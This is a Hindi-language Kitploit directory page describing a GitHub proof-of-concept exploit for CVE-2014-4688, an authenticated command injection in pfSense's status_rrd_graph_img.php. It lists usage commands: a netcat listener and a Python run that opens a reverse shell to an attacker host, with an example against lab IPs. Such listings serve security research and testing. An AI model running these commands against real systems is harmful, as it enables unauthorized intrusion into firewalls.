Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-4688-pfsense — CVE-2014-4688 के लिए संशोधित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो pfSense status_rrd_graph_img.php में एक कमांड इंजेक्शन भेद्यता है, जो SSL हैंडलिंग के साथ प्रमाणित रिमोट कोड निष्पादन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/jaydenblair/cve-2014-4688-pfsense
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubjaydenblair/cve-2014-4688-pfsense

CVE-2014-4688-pfsense

CVE-2014-4688 के लिए संशोधित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो pfSense status_rrd_graph_img.php में एक कमांड इंजेक्शन भेद्यता है, जो SSL हैंडलिंग के साथ प्रमाणित रिमोट कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-4688 – pfSense कमांड इंजेक्शन

CVE-2014-4688 के लिए संशोधित Exploit-DB प्रूफ-ऑफ-कॉन्सेप्ट (pfSense status_rrd_graph_img.php कमांड इंजेक्शन)

अवलोकन

इस रिपॉजिटरी में CVE-2014-4688 के लिए मूल Exploit-DB प्रूफ-ऑफ-कॉन्सेप्ट का एक संशोधित संस्करण है, जो pfSense संस्करण ≤ 2.1.3 को प्रभावित करता है।

यह कमजोरी status_rrd_graph_img.php घटक के भीतर मौजूद है और database पैरामीटर के अनुचित इनपुट सैनिटाइज़ेशन के कारण प्रमाणित उपयोगकर्ताओं को मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।

  • मूल एक्सप्लॉइट लेखक: absolomb
  • मूल स्रोत: Exploit-DB

कमजोरी सारांश

  • CVE: CVE-2014-4688
  • प्रभावित संस्करण: pfSense ≤ 2.1.3
  • घटक: status_rrd_graph_img.php
  • प्रभाव: प्रमाणित कमांड निष्पादन

एक प्रमाणित उपयोगकर्ता कमजोर एंडपॉइंट को दिए गए क्राफ्टेड इनपुट के माध्यम से मनमाने शेल कमांड इंजेक्ट कर सकता है।

संशोधन

  • स्व-हस्ताक्षरित प्रमाणपत्र वातावरण के लिए सत्र-स्कोप्ड SSL हैंडलिंग जोड़ी गई
  • urllib3 असुरक्षित अनुरोध चेतावनियाँ दबा दी गईं

उपयोग

एक लिसनर शुरू करें:

root@kitploit:~
nc -lvnp <LPORT>

प्रूफ ऑफ कॉन्सेप्ट:

root@kitploit:~
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>

उदाहरण

root@kitploit:~
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password

अस्वीकरण

यह रिपॉजिटरी केवल अधिकृत सुरक्षा अनुसंधान, शिक्षा और नियंत्रित परीक्षण उद्देश्यों के लिए प्रदान की गई है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।

टूल डाउनलोड करें